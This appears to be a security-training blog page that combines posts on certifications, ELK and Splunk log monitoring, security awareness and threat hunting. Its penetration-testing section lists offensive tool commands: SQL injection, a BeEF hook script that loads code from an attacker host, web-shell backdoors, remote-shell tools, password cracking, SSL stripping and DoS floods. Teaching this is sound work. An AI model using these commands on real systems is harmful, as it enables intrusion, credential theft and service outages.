Blog

Latest News From Blog

Network Security

Top Network Security Certifications and How to Choose the Right One for You

Network security is an organization’s first line of defense against hackers and other cyber threats. With projections that cybercrime will inflict $6 trillion worth of damage around the world in 2021, it is easy to see why network security has risen in prominence. However, just as there are many different forms of cyberattack, there is a dizzying array of cybersecurity certifications to choose from.

Although having so many cybersecurity choices is arguably a good thing, the sheer number and variety also pose a challenge. It’s easy to get overwhelmed by the number of choices, sometimes to the point of not making a choice at all. What are the top network security certifications? Which one(s) are right for you and your organization? Are any of the top cyber security certifications universally applicable?

In this article, we are going to shine the spotlight on various topics, including:

What is network security?
The need for network security
Various types of network security
Network security jobs and salaries
Best network security certifications

What is Network Security?

Most experts define network security as the policies and practices of taking protective measures to protect network infrastructure from trespassing, illegal access, modification, abuse, change, destruction, or the unauthorized gathering and release of data. The full process requires a combination of hardware devices, security software, and user awareness of security procedures and techniques. The latter element can range from employees getting briefed on proper security practices to professionals who have taken network security training.

Why is Network Security Needed?

So many aspects of our lives have migrated to the digital world. We use the internet to conduct financial transactions, communicate with family and colleagues, make purchases, seek entertainment, and engage in research. So much of our personal information resides online: birth dates, Social Security (or other identification) numbers, health history, credit history, bank accounts, utility bills, and a host of other things.

All that data and all those transactions are vulnerable to hackers and cybercriminals. The more of our lives we commit to the internet, the higher the risk of compromise. Moreover, the continuing importance of the Internet of Things (IoT) means even more reliance on wireless networks, which only widens the threat landscape, giving criminals more avenues and opportunities to perpetrate fraud. There is too much at stake in our personal and commercial lives to let network security slip. So, what types of network security are there?

What Are the Types of Network Security?

There is a whole arsenal of network security tools, methods, and practices available to cybersecurity professionals. Here’s a high-level overview:

Software

Security software resources include anti-virus, anti-malware, and anti-spyware. These tools are available as suites or as subscriptions, updated continuously by the hosting vendor to keep up with the latest threats. These applications monitor your network, blocking intruders, malware, and viruses.

As an aside, it’s extremely wise to opt for a security subscription as opposed to getting a suite and loading it in-house. Subscription providers/vendors are in a better position to deal with the constant changes to the cyber security landscape. There seems to be a new cyber threat or virus emerging every day, and your software won’t defend against threats it doesn’t yet know exist. That’s why it’s better to leave that heavy lifting to the subscription provider.

Password Protection

This is such a simple measure, but it is extremely important. Strong passwords are an inexpensive yet effective way of keeping systems, applications, and networks safe, and you don’t have to be a seasoned cybersecurity professional to put strong passwords into practice. And when we say “strong” passwords, we don’t mean ridiculous ones like “password” or “99999”.

Firewalls

If you picture your network as an exclusive nightclub, then the firewall would be the bouncer, working the door and keeping out undesirables. Firewalls filter traffic (incoming and outgoing) based on predetermined policies, preventing unauthorized users from coming in. Anyone who has tried to work remotely but was locked out of their company’s main systems for lack of the right authorization has experienced first-hand the effectiveness of a firewall.

Email Security Software

Email is a very vulnerable point in any network. Cybercriminals love to send bogus emails that look like correspondence from legitimate companies and financial institutions, and just one click on a link embedded in these fraudulent emails could be enough to compromise your system. To that end, email security software can not only filter out incoming threats but also prevent certain kinds of data from being transmitted.

Segmented Networks

This process sorts and divides traffic based on specific established criteria. Segmented networks are especially useful for limiting users to just one area, specifically the one they need to do their work, while keeping them out of data that is outside their wheelhouse. Restricting users like this helps decrease the overall network’s weak spots.

Which are the Best Network Security Certifications?

Before you can make big bucks in the network security field, you need to learn the tools and skills. That’s where network security training comes in. Network security certification courses not only give you the essential knowledge for these positions, but they also give you that valuable certificate that shows prospective employers that you have the required qualifications.

Let’s dig into some of the major network security certifications.

1. CEH: Certified Ethical Hacker

Also known as “white hat hackers,” these are IT security professionals whose job is to try to penetrate systems and find vulnerabilities. Businesses and organizations hire them to find weaknesses in the system and figure out how to fix them. When you consider how important cybersecurity has become, it’s unsurprising that this certification is such a sought-after commodity.

2. CISSP: Certified Information Systems Security Professional

This certification is for experienced security professionals who are responsible for the development and management of their organization’s security procedures, policies, and standards. It is perfect for IT security professionals who want to take their careers to the next level.

3. CISM: Certified Information Security Manager

This certification is a critical resource for IT professionals who have enterprise-level security management responsibilities. They manage, develop, and oversee security systems and develop organizational best practices.

4. CCSP: Certified Cloud Security Professional

This certification has become highly sought after as many organizations increasingly migrate to the cloud. The course focuses on IS and IT professionals who apply best practices to cloud security architecture, design, operations, and service orchestration. If you work with cloud platforms, this is a must.

5. CISA: Certified Information Systems Auditor

This certification targets IS professionals who focus primarily on audit control, assurance, and security. It provides you with the skills required to govern and control enterprise IT and perform an effective security audit.

SIEM Technology

ELK Stack: Get Started with Elasticsearch, Logstash, Kibana, & Beats

Introduction

Elastic Stack, formerly known as the ELK stack, is a popular suite of tools for ingesting, viewing, and managing log files. As open-source software, you can download and use it for free (though fee-based and cloud-hosted versions are also available).

Prerequisites

A system with Elasticsearch installed

What is ELK Stack?

ELK stands for Elasticsearch, Logstash, and Kibana. In previous versions, the core components of the ELK Stack were:

Elasticsearch – The core component of ELK. It works as a searchable database for log files.
Logstash – A pipeline to retrieve data. It can be configured to retrieve data from many different sources and then send it to Elasticsearch.
Kibana – A visualization tool. It uses a web browser interface to organize and display data.

Additional software packages called Beats are a newer addition. These are smaller data collection applications, specialized for individual tasks. There are many different Beats applications for different purposes. For example, Filebeat is used to collect log files, while Packetbeat is used to analyze network traffic.

As the stack quickly outgrew the three components named in the ELK acronym, Elastic Stack became the more fitting and scalable name. However, ELK and Elastic Stack are used interchangeably.

Why Use ELK Stack?

The ELK stack creates a flexible and reliable data parsing environment. Organizations, especially ones with cloud-based infrastructures, benefit from implementing the Elastic stack to address the following issues:

Working on various servers and applications creates large amounts of log data, which is not human-readable. The ELK stack serves as a powerful centralized platform for collecting and managing unstructured information, turning it into useful assets in the decision-making process.
The ELK stack with basic features is open source, which makes it a cost-efficient solution for startups and established businesses alike.
The Elastic stack provides a robust platform for performance and security monitoring, ensuring maximal uptime and regulatory compliance.
The Elastic stack addresses the industry gap with log data. The software can reliably parse data from multiple sources into a scalable centralized database, allowing both historical and real-time analysis.

How Does Elastic Stack Work?

The Elastic stack follows certain logical steps, all of which are configurable.

1. A computer or server creates log files. All computers have log files that document events on the system in a hard-to-read format. Some systems, such as server clusters, generate massive amounts of log files. However, Elastic Stack is designed to help manage scalable amounts of data.

2. The various available information files are collected by a Beats application. Different Beats reach out to different parts of the server, read the files, and ship them out. Some users may skip Beats altogether and use Logstash directly. Others may connect Beats directly to Elasticsearch.

3. Logstash is configured to reach out and collect data from the different Beats applications (or directly from various sources). In larger configurations, Logstash can filter data from multiple systems and collect the information into one location.

4. Elasticsearch is used as a scalable, searchable database to store data. Elasticsearch is the warehouse where Logstash or Beats pipe all the data.

5. Finally, Kibana provides a user-friendly interface for you to review the data that has been collected. It is highly configurable, so you can adjust the metrics to fit your needs. Kibana also provides graphs and other tools to visualize and interpret patterns in the data.

ELK Stack Supporting Applications

Additional third-party applications enhance the Elastic Stack, providing wider use-case possibilities. Some external applications supported by the ELK stack are:

Apache Kafka

Kafka is a real-time streaming distribution platform. That means that it can read multiple data sources at once. Kafka acts as a data buffer and helps prevent data loss or interruption while streaming files quickly.

Redis

Redis is a NoSQL key-value database with incredible read/write speeds and various data types. When added to the Elastic stack, Redis often serves as a buffer for data stream spikes, ensuring no data is lost.

Hadoop

Hadoop is a massive batch-processing data storage system. Indexing data from Hadoop into the real-time Elasticsearch engine creates an interactive bi-directional data discovery and visualization platform. The Hadoop support comes through the Elasticsearch-Hadoop Connector, offering full support for Spark, Streaming, Hive, Storm, MapReduce, and other tools.

RabbitMQ

RabbitMQ is a messaging platform. Elastic Stack users use this software to build a stable, buffered queue of log files.

Nginx

Nginx is best known as a web server that can also be set up as a reverse proxy. It can be used to manage network traffic or to create a security buffer between your server and the internet.

ELK Stack Advantages and Disadvantages

The Elastic stack comes with certain benefits and drawbacks.

Advantages

The Elastic stack and its components are free to try out and use.
ELK offers numerous hosting options, whether on-premises or deployed as a managed service.
The capability to centralize logging from complex cloud environments allows advanced searches and the creation of correlations from multiple sources on a single platform.
Real-time analysis and visualization decrease the time taken to discover insights, enabling continual monitoring.
Client support for multiple programming languages, including JavaScript, Python, Perl, Go, etc.

Disadvantages

Deploying the stack is a complex process and depends on the requirements. Check out our tutorial for deploying the Elastic stack on Kubernetes.
Growing and maintaining the ELK stack is costly and requires computing and data storage sized to the data volume and retention time.
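The pipeline steps described above (Beats ships log lines, Logstash parses them, Elasticsearch stores them, Kibana charts them) look like this in a Logstash configuration. This is an added example, not part of the original article or of the Elastic project; the Beats port, the Elasticsearch host, the index name and the sample sshd log line are assumptions, and it assumes Filebeat is pointed at this Logstash host with an output.logstash section.

```conf
# Added example (not from the original article): a minimal Logstash pipeline
# for authentication logs shipped by Filebeat. Logstash reads its pipeline
# definitions from /etc/logstash/conf.d/*.conf on a package install.

input {
  beats {
    port => 5044            # assumed: Filebeat's output.logstash hosts point here
  }
}

filter {
  # Step 3: parse the generic syslog envelope. A constructed sample line is
  #   Mar  1 12:00:01 web01 sshd[2345]: Failed password for invalid user admin from 203.0.113.5 port 52211 ssh2
  grok {
    match => {
      "message" => "%{SYSLOGTIMESTAMP:syslog_timestamp} %{SYSLOGHOST:syslog_host} %{DATA:program}(?:\[%{POSINT:pid}\])?: %{GREEDYDATA:syslog_message}"
    }
  }

  # Pull the fields a SOC would search on (account, source address) out of
  # sshd failures so Kibana can count them per host and per source.
  if [program] == "sshd" {
    grok {
      match => {
        "syslog_message" => "Failed password for (invalid user )?%{USERNAME:failed_user} from %{IP:source_ip} port %{POSINT:source_port}"
      }
      add_tag => ["ssh_auth_failure"]
      # Most sshd lines are not failed logins; do not mark them as parse errors.
      tag_on_failure => []
    }
  }

  # Use the time in the log line as the event time, not the ingest time,
  # so historical and real-time analysis line up (syslog has no year).
  date {
    match => [ "syslog_timestamp", "MMM  d HH:mm:ss", "MMM dd HH:mm:ss" ]
  }
}

output {
  # Step 4: one daily index per day keeps retention and deletion simple.
  elasticsearch {
    hosts => ["http://localhost:9200"]   # assumed Elasticsearch endpoint
    index => "auth-%{+YYYY.MM.dd}"
  }
}
```

Run it with /usr/share/logstash/bin/logstash -f /etc/logstash/conf.d/auth.conf and, in Kibana, create a data view matching auth-* to chart events tagged ssh_auth_failure by source_ip.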

Other

Security Awareness - 2023

What is Security Awareness?

Let’s start with a clear understanding of the three different types of learning activities that organizations use, whether for information security or for any other purpose:

Education: The overall goal of education is to help learners improve their understanding of ideas and their ability to relate them to their own experiences and apply that learning in useful ways.
Training: Focuses on building proficiency in a specific set of skills or actions, including sharpening the perception and judgment needed to decide which skill to use, when to use it, and how to apply it. Training can focus on low-level skills, an entire task, or complex workflows consisting of many tasks.
Awareness: These are activities that attract and engage the learner’s attention by acquainting them with aspects of an issue, concern, problem, or need.

You’ll notice that none of these has an expressed or implied degree of formality, location, or target audience. (Think of a newly hired senior executive with little or no exposure to the specific compliance needs your organization faces; first, someone has to get their attention and make them aware of the need to understand. The rest can follow.)

Security Awareness Examples - 2023

Let’s look at an example of security awareness training by using an organization’s strategy to improve fire safety in the workplace:

Education may help workers in a secure server room understand the interaction of the various fire and smoke detectors, suppression systems, and alarms, and their interactions with electrical power, lighting, and ventilation systems.
Training would provide those workers with task-specific, detailed learning about the proper actions each should take in the event of an alarm, a suppression system going off without an alarm, a ventilation system failure, or other contingencies. This training would build on the learning acquired via the educational activities.
Awareness activities would include not only posting the appropriate signage and floor or doorway markings, but also other indicators to help workers detect an anomaly, respond to an alarm, and take appropriate action. In this case, awareness is a constantly available reminder of what to do when the alarms go off.

Translating that into an anti-phishing campaign might be done by:

Education may be used to help select groups of users better understand the ways in which social engineering attacks are conducted and engage those users in creating and testing their own strategies for improving their defensive techniques.
Training will help users increase their proficiency in recognizing a potential phishing or similar attempt, while also helping them practice the correct responses to such events. Training may include simulated phishing emails sent to users on a network to test their ability to identify a phishing email.
Awareness means raising users’ overall awareness of the threat posed by phishing, vishing, SMS phishing (also called “smishing”), and other social engineering tactics. Awareness techniques can also alert selected users to new or novel approaches that such attacks might be taking.

Let’s look at some common risks and why it’s important to include them in your security awareness training programs.

Phishing

The use of phishing attacks to target individuals, entire departments, and even companies is a significant threat that the security professional needs to be aware of and be prepared to defend against. Countless variations on the basic phishing attack have been developed in recent years, leading to a variety of attacks that are deployed relentlessly against individuals and networks in a never-ending stream of emails, phone calls, spam, instant messages, videos, file attachments, and many other delivery mechanisms. Phishing attacks that attempt to trick highly placed officials or private individuals with sizable assets into authorizing large fund wire transfers to previously unknown entities are known as whaling attacks.

Social Engineering

Social engineering is an important part of any security awareness training program for one very simple reason: bad actors know that it works. For cyber attackers, social engineering is an inexpensive investment with a potentially very high payoff. Social engineering, applied over time, can extract significant insider knowledge about almost any organization or individual. One of the most important messages to deliver in a security awareness program is an understanding of the threat of social engineering. People need to be reminded of the threat and types of social engineering so that they can recognize and resist a social engineering attack. Most social engineering techniques are not new. Many have even been taught as basic fieldcraft for espionage agencies and are part of the repertoire of investigative techniques used by real and fictional police detectives. A short list of the tactics that we see across cyberspace currently includes:

Phone phishing or vishing: Using a rogue interactive voice response (IVR) system to re-create a legitimate-sounding copy of a bank or other institution’s IVR system. The victim is prompted through a phishing email to call the “bank” via a provided phone number to verify information such as account numbers, account access codes or a PIN, and to confirm answers to security questions, contact information and addresses. A typical vishing system will reject logins continually, ensuring the victim enters PINs or passwords multiple times, often disclosing several different passwords. More advanced systems may be used to transfer the victim to a human posing as a customer service agent for further questioning.
Pretexting: The human equivalent of phishing, where someone impersonates an authority figure or a trusted individual in an attempt to gain access to your login information. The pretext may claim to be an IT support worker who is supposed to do maintenance or an investigator performing a company audit. Or they might impersonate a coworker, the police, the tax authority, or some other seemingly legitimate person. The goal is to gain access to your computer and information.
Quid pro quo: A request for your password or login credentials in exchange for some compensation, such as a “free gift,” a monetary payment, or access to an online game or service. If it sounds too good to be true, it probably is.
Tailgating: The practice of following an authorized user into a restricted area or system. The low-tech version of tailgating would occur when a stranger asks you to hold the door open behind you because they forgot their company RFID card. In a more sophisticated version, someone may ask to borrow your phone or laptop to perform a simple action when he or she is actually installing malicious software onto your device.

Social engineering works because it plays on human tendencies. Education, training, and awareness work best to counter or defend against social engineering because they help people realize that every person in the organization plays a role in information security.

Password Protection

We use many different passwords and systems. Many password managers will store a user’s passwords for them so the user does not have to remember all their passwords for multiple systems. The greatest disadvantage of these solutions is the risk of compromise of the password manager. These password managers may be protected by a weak password or passphrase chosen by the user and easily compromised. There have been many cases where a person’s private data was stored by a cloud provider but easily accessed by unauthorized persons through password compromise. Organizations should encourage the use of different passwords for different systems and should provide a recommended password management solution for their users. Examples of poor password protection that should be avoided are:

Reusing passwords for multiple systems, especially using the same password for business and personal use.
Writing down passwords and leaving them in unsecured areas.
Sharing a password with tech support or a co-worker.

Web Application Security

Tools for Penetration Testing

While producing high-technology mobile apps and websites, there is no avoiding security issues. That is why there are many top-notch pentest tools for handling multiple workflows that allow detection, elimination, and prevention of web security attacks.

What is Penetration Testing?

The idea behind any penetration testing is to identify security-related vulnerabilities in a software application by conducting a security attack to determine how much damage a hacker may cause when trying to hack the product. The results of this practice help to make applications and software more secure, robust, and unbreakable, and the users’ experience more successful.

So, if you are going to develop and use any software for your business, the automated penetration testing method will help you to check network security threats.

How Penetration Tests Work

Penetration testing is a simulated real-time cyber-attack conducted by certified security professionals (hackers) under secure conditions to detect gaps, glitches, vulnerabilities, loopholes, misconfigurations, etc. that are susceptible to further malicious code injections, malware, unauthorized entries, attacks, etc.

Application testers then try to exploit these vulnerabilities, typically by stealing data, escalating privileges, intercepting traffic, etc., to understand the nature of the damage they may cause. However, it’s hard to find all possible vulnerabilities using automated tools. Some threats can only be identified by manual system scans.

To uncover the security vulnerabilities that can be found in any type of web application, there are three major test types:

Black Box Testing;
White Box Testing;
Gray Box Testing.

Black box testing: A black box assessment is mostly performed without any knowledge of the system’s internals. Here testers check out the system solely from the outside. They have no idea of what is happening within the system to generate responses and test actions.

White box testing: In a white box assessment, the testers have the fullest and most complete internal knowledge of the system that’s being tested (design docs, source code, etc.).

Gray box testing: Gray box testing is another application security test technique that is a mix of both white box and black box testing.

Best Penetration Testing Tools

01. Database Tools

sqlmap: automates the process of detecting and exploiting SQL injection flaws and taking over database servers.
sqlmap -u victim_url
sqlmap --headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0" --cookie="security=low; PHPSESSID=oikbs8qcic2omf5gnd09kihsm7" -u 'http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#' --level=5 --risk=3 -p id --suffix="-BR" -v3

02. CMS Scanning Tools

WPScan
wpscan --version
wpscan -u "URL of webpage"

Joomscan
joomscan -h
joomscan --version
joomscan /?
joomscan -u victim_url

03. SSL Scanning Tools

TLSSLed
tlssled URL port

w3af (web audit framework): start w3af, enter the URL of the victim, and start the scan.

04. Metasploit

msfupdate
msf > search name:Microsoft type:exploit

Armitage: Metasploit GUI.

BeEF
beef-xss (username and password: beef)
<script src="http://192.168.1.101:3000/hook.js" type="text/javascript"></script>

Linux Exploit Suggester
root@parrot:/usr/share/linux-exploit-suggester# ./Linux_Exploit_Suggester.pl -k 3.0.0

Forensics Tools

p0f: identifies the operating system of a target host simply by examining captured packets. In the hands of advanced users, p0f can detect firewall presence, NAT use, and the existence of load balancers.
p0f --version
p0f -h
p0f -i eth0 -p -o filename
open 192.168.1.2

pdf-parser: parses a PDF document to identify the fundamental elements used in the analyzed PDF.
pdf-parser -o 10 filepath

dumpzilla: extracts all forensically interesting information from Firefox, Iceweasel, and Seamonkey browsers.

ddrescue: copies data from one file or block device (hard disc, CD-ROM, etc.) to another, trying to rescue the good parts first in case of read errors.
dd_rescue infilepath outfilepath
dd_rescue -v /dev/sdb ~/sec.img

DFF
dff-gui

Social Engineering

Social Engineering Toolkit
sudo apt install sendmail
vim config/set_config # change the SENDMAIL=OFF flag to SENDMAIL=ON

05. Stressing Tools

DoS attacks or stress tests for different applications, so as to take appropriate measures for the future.

Slowhttptest
slowhttptest --version
slowhttptest -h
# sample
slowhttptest -c 500 -H -g -o outputfile -i 10 -r 200 -t GET -u http://192.168.1.202/index.php -x 24 -p 2
Where,
-c 500 = 500 connections
-H = Slowloris mode
-g = generate statistics
-o outputfile = output file name
-i 10 = use 10 seconds to wait for data
-r 200 = 200 connections
-t GET = GET requests
-u http://192.168.1.202/index.php = target URL
-x 24 = maximum length of 24 bytes
-p 2 = 2-second timeout

Inviteflood: SIP/SDP INVITE message flooding over UDP/IP.
inviteflood --version
# format
inviteflood eth0 target_extension target_domain target_ip number_of_packets
# sample
inviteflood eth0 2000 192.168.x.x 192.168.x.x 1
Where,
target_extension is 2000
target_domain is 192.168.x.x
target_ip is 192.168.x.x
number_of_packets is 1
-a is the alias of the SIP account

Iaxflood: VoIP DoS tool.
iaxflood --version
iaxflood -h
iaxflood sourcename destinationname numpackets
iaxflood ip_src ip_dest packets

thc-ssl-dos: verifies the performance of SSL. Establishing a secure SSL connection requires 15x more processing power on the server than on the client.
# format
thc-ssl-dos victimIP httpsport --accept
# example
thc-ssl-dos 192.168.1.1 443 --accept

06. Sniffing & Spoofing

Burpsuite: the sniffing tool between your browser and the web servers, used to find the parameters that the web application uses.

mitmproxy: SSL-capable man-in-the-middle HTTP proxy.
mitmproxy --version
mitmproxy -h
mitmproxy -p portnumber
mitmproxy -p 80

07. Wireshark

sslstrip: MITM attack that forces a victim's browser to communicate in plain text over HTTP.
sslstrip --version
sslstrip -h
sslstrip -p 80

08. Password Cracking Tools

Hydra: login cracker that supports many protocols to attack.
hydra -l /usr/share/wordlists/metasploit/user -P /usr/share/wordlists/metasploit/passwords ftp://192.168.1.101 -V

Johnny: GUI for the John the Ripper password cracking tool.
John: CLI for the Johnny GUI.
unshadow passwd shadow > unshadowed.txt

Rainbowcrack: cracks hashes by rainbow table lookup.
rcrack -h
rcrack path_to_rainbow_tables -f path_to_password_hash
./rcrack . -h 5d41402abc4b2a76b9719d911017c592
./rcrack . -l hash.txt

09. SQLdict: dictionary attack tool for SQL Server.
sqldict
Under “Target IP Server” and “Target Account”, enter the server IP and the username. Load the file with the passwords and start.

hash-identifier: identifies types of hashes.
hash-identifier 5d41402abc4b2a76b9719d911017c592

10. Maintaining Access

Used to maintain a connection and access to a hacked machine even when it connects and disconnects again.

Powersploit: helps to connect with the victim’s machine via PowerShell.
cd /usr/share/powersploit/

Sbd: similar to Netcat; features AES-CBC-128 + HMAC-SHA1 encryption.
# server
sbd -l -p 44
# victim
sbd 192.168.43.2 44

Weevely: PHP web shell that simulates a telnet-like connection, used as a stealth backdoor.
# check
weevely -h
# format
weevely generate password pathoffile
# sample
weevely generate adm1n123 ~/Desktop/about1.php
# format
weevely URL password
# sample
weevely http://198.168.32.13 adm1n123

http-tunnel: creates a bidirectional virtual data stream tunneled in HTTP requests. This can be useful for users behind restrictive firewalls.
# server
httptunnel_server -h
# client
httptunnel_client -h

cryptcat: similar to Netcat; allows making TCP and UDP connections with a victim’s machine in an encrypted way.
# server
cryptcat -l -p port -n
# client
cryptcat IPofServer PortofServer

11. Reverse Engineering

OllyDbg: 32-bit assembler-level analyzing debugger for MS Windows applications, used to crack commercial software.
start ollydbg

dex2jar: converts an APK file (Android) to a JAR file in order to view the source code.
d2j-dex2jar -d /file location
d2j-dex2jar -d ~/Desktop/class.dex

jd-gui: standalone graphical utility that displays the Java source code of “.class” files.
jd-gui

apktool: one of the best tools to reverse a whole Android application.
apktool
# decompile
apktool d apk file

12. Reporting Tools

Dradis
service dradis start
dradis
open https://machine_ip:3004
Imports files from NMAP, NESSUS, and NEXPOSE.

Metagoofil: searches Google to identify and download documents to the local disk and then extracts the metadata.
# help
metagoofil -h
metagoofil -d udsm -t docx -l 3 -o ~/Downloads -f ~/Downloads/metagoofil_res
-d (domain name)
-t (filetype to download: docx, pdf, etc.)
-l (limit the results: 10, 100)
-n (limit files to download)
-o (location to save the files)
-f (output file)

Misc

strace
# sample
strace -e trace=network,read,write /path/to/app args
# example
strace -e trace=network,read,write customapp

SIEM Technology

How to Install Splunk on Ubuntu server?

In this article, I'll explain how to install the latest Splunk on an Ubuntu server. Splunk processes data to make it useful to the user without altering the original data. It is one of the most powerful tools for analyzing, exploring, and searching data, and one of the easiest ways to index, search, collect, and visualize massive data streams in real time from applications, web servers, databases, server platforms, cloud networks, and more.

Splunk Architecture

There are three main components in Splunk:

Splunk Forwarder
Splunk Indexer
Splunk Search Head

The Splunk Forwarder is used for data forwarding; it is the component that collects the logs. The Splunk Indexer parses and indexes the data: the Splunk instance transforms the incoming data into events and stores them in indexes so that search operations run efficiently. Lastly, the Splunk Search Head is the graphical interface used for searching, analyzing, and reporting.

Installing Splunk on Ubuntu 18.04

Create a Splunk account and download the Splunk Enterprise software from their official website. Now upload the downloaded file to your Ubuntu 18.04 server and place it in a temporary directory. Next, run the dpkg command to install the Splunk server:

# dpkg -i splunk-7.1.0-2e75b3406c5b-linux-2.6-amd64.deb
Selecting previously unselected package splunk.
(Reading database ... 66600 files and directories currently installed.)
Preparing to unpack splunk-7.1.0-2e75b3406c5b-linux-2.6-amd64.deb ...
Unpacking splunk (7.1.0) ...
Setting up splunk (7.1.0) ...
complete

Secondly, we need to create the init.d script so that we can easily start and stop Splunk. Change to the Splunk binary directory at /opt/splunk/bin/ and run the Splunk executable with the arguments below:

# cd /opt/splunk/bin/
# ./splunk enable boot-start
Splunk Software License Agreement 04.24.2018
Do you agree with this license? [y/n]: y
Do you agree with this license? [y/n]: y
This appears to be your first time running this version of Splunk.
An Admin password must be set before installation proceeds.
Password must contain at least:
   * 8 total printable ASCII character(s).
Please enter a new password:
Please confirm new password:
Copying '/opt/splunk/etc/openldap/ldap.conf.default' to '/opt/splunk/etc/openldap/ldap.conf'.
Generating RSA private key, 2048 bit long modulus
.......+++
................+++
e is 65537 (0x10001)
writing RSA key
Generating RSA private key, 2048 bit long modulus
.............................................................+++
............+++
e is 65537 (0x10001)
writing RSA key
Moving '/opt/splunk/share/splunk/search_mrsparkle/modules.new' to '/opt/splunk/share/splunk/search_mrsparkle/modules'.
Init script installed at /etc/init.d/splunk.
Init script is configured to run at boot.

During this process, you can press the spacebar to page through the license agreement and then type y to accept it, as shown in the installation output. Finally, start the Splunk service with the command below:

# service splunk start

Now you can access the Splunk Web interface at http://Server-IP:8000/ or http://Server-hostname:8000/. You need to make sure that port 8000 is open on your server firewall. Provide the admin login credentials created during the installation to access the Splunk GUI. Once you have logged in, your Splunk dashboard is ready to use. There are different categories listed on the home page; choose the one you need and start Splunking.

Adding a Task

Here is an example of a simple task added to the Splunk system; the snapshots show how I added it. My task is to add the /var/log folder to Splunk for monitoring.

Step 1: Open the Splunk Web interface and choose the Add Data option.

Step 2: The Add Data tab opens with three options: Upload, Monitor, and Forward. Each option comes with a short description of its purpose. Our task is to monitor a folder, so we go ahead with Monitor. The Monitor option has four categories:

Files & Directories: monitor files and folders
HTTP Event Collector: monitor data streams over HTTP
TCP/UDP: monitor traffic on TCP/UDP ports
Scripts: monitor custom scripts or commands

Step 3: For our purpose, I choose the Files & Directories option.

Step 4: Browse to the exact folder path /var/log on the server to monitor. Once you have selected the settings, click Next and Review. Once all your settings have been reviewed, click Submit to finish.

Step 5: Your data source has now been added to Splunk for monitoring. You can start searching and monitoring the log files as required. I have narrowed the logs down to the Apache application on the server.

This is just a simple example of Splunking; you can add as many tasks as you like and explore your local or remote server data. Splunk also provides tools to create tables and visualizations using multiple fields and metrics, depending on your log analysis.
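The folder-monitoring task above was done through Splunk Web; the same input can be declared in inputs.conf or added with the Splunk CLI, which is what you want when the install is scripted. The script below is an added example, not code from the post or from Splunk itself. It assumes the install path /opt/splunk used above, a constructed sample inputs.conf, and helper names (parse_deb_version, render_monitor_stanza, monitor_configured, install_splunk) that are my own; the install function mirrors the post's dpkg, enable boot-start and service start steps and is only run when the script is invoked with --install.

```shell
#!/bin/sh
# Added example (not from the original post): the "Adding a task" step done from
# the command line instead of Splunk Web, plus checks an administrator can run
# before and after the install. /opt/splunk follows the post; the package
# filename and the sample inputs.conf below are constructed for this example.
set -eu

SPLUNK_HOME=/opt/splunk

# Extract the Splunk version from a package filename such as
# splunk-7.1.0-2e75b3406c5b-linux-2.6-amd64.deb, so a script can refuse to
# install a package that is not the release that was reviewed.
parse_deb_version() {
  printf '%s\n' "$1" | sed -n 's/^splunk-\([0-9][0-9.]*\)-.*\.deb$/\1/p'
}

# Render the inputs.conf stanza that Splunk Web writes when you pick
# "Files & Directories" and choose a path: [monitor://<path>], the index the
# events go to, and an optional sourcetype.
render_monitor_stanza() {
  local path index sourcetype
  path=$1; index=${2:-main}; sourcetype=${3:-}
  printf '[monitor://%s]\n' "$path"
  printf 'disabled = false\n'
  printf 'index = %s\n' "$index"
  if [ -n "$sourcetype" ]; then
    printf 'sourcetype = %s\n' "$sourcetype"
  fi
}

# Return 0 if the given inputs.conf already has a monitor stanza for the
# path, so the same folder is not added twice.
monitor_configured() {
  local conf path
  conf=$1; path=$2
  grep -Fxq "[monitor://$path]" "$conf"
}

# The install sequence from the post, as a function so the checks above can be
# run without root. --accept-license answers the license prompt
# non-interactively; the admin password prompt still appears on first start,
# and "splunk add monitor" prompts for those admin credentials.
install_splunk() {
  local deb expected
  deb=$1; expected=$2
  [ "$(parse_deb_version "$deb")" = "$expected" ] || {
    echo "refusing to install: $deb is not version $expected" >&2; return 1; }
  dpkg -i "$deb"
  "$SPLUNK_HOME/bin/splunk" enable boot-start --accept-license
  service splunk start
  # Equivalent of the Web UI task: monitor /var/log into the main index.
  "$SPLUNK_HOME/bin/splunk" add monitor /var/log -index main
}

# Constructed sample of an inputs.conf as Splunk Web might have written it.
SAMPLE_CONF=$(mktemp)
trap 'rm -f "$SAMPLE_CONF"' EXIT
cat > "$SAMPLE_CONF" <<'EOF'
[monitor:///var/log/syslog]
disabled = false
index = main
sourcetype = syslog

[monitor:///var/log]
disabled = false
index = main
EOF

if [ "${1:-}" = "--install" ]; then
  install_splunk "${2:?deb path}" "${3:?expected version}"
else
  # Default run: show the stanza for the post's task without touching the host.
  render_monitor_stanza /var/log main
fi
```

Run it with no arguments to see the stanza for /var/log; run it as root with `--install <deb> 7.1.0` to perform the install from the post and add the same input. Checking the version from the filename before calling dpkg is a cheap guard against installing a package other than the one you downloaded and reviewed, and the monitor_configured check keeps re-runs from adding duplicate inputs.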


What is Threat Hunting?

Threat hunting is a security function that combines proactive methodology, innovative technology, and threat intelligence to find and stop malicious activities.

For companies that are ready to take a more proactive approach to cyber security, one that attempts to stop attacks before they get too deep, adding threat hunting to their security program is the next logical step. After solidifying their endpoint security and incident response strategies to mitigate the known malware attacks that are inevitable today, organizations can then go on the offensive. They are ready to dig deep and find what hasn't yet been detected, and that is exactly the purpose of threat hunting.

Threat hunting is an aggressive tactic that works from the premise of the "assumption of breach": that attackers are already inside an organization's network and are covertly monitoring and moving throughout it. This may seem far-fetched, but in reality attackers may be inside a network for days, weeks, or even months on end, preparing and executing attacks such as advanced persistent threats, without any automated defense detecting their presence. Threat hunting stops these attacks by seeking out covert indicators of compromise (IOCs) so they can be mitigated before the attacks achieve their objectives.

The Key Elements of Threat Hunting

The goal of threat hunting is to monitor everyday activities and traffic across the network and investigate possible anomalies to find any yet-to-be-discovered malicious activities that could lead to a full-blown breach. To achieve this level of early detection, threat hunting incorporates four equally important components:

Methodology. To be successful at threat hunting, companies must commit to a proactive, full-time approach that is ongoing and ever-evolving. A reactive, ad hoc, "when we have time" perspective is self-defeating and nets only minimal results.

Technology. Most companies already have comprehensive endpoint security solutions with automated detection in place. Threat hunting works in addition to these and adds advanced technologies to find anomalies, unusual patterns, and other traces of attackers that shouldn't be in systems and files. New cloud-native endpoint protection platforms (EPPs) that leverage big data analytics can capture and analyze large volumes of unfiltered endpoint data, while behavioral analytics and artificial intelligence can provide extensive, high-speed visibility into malicious behaviors that seem normal at the outset.

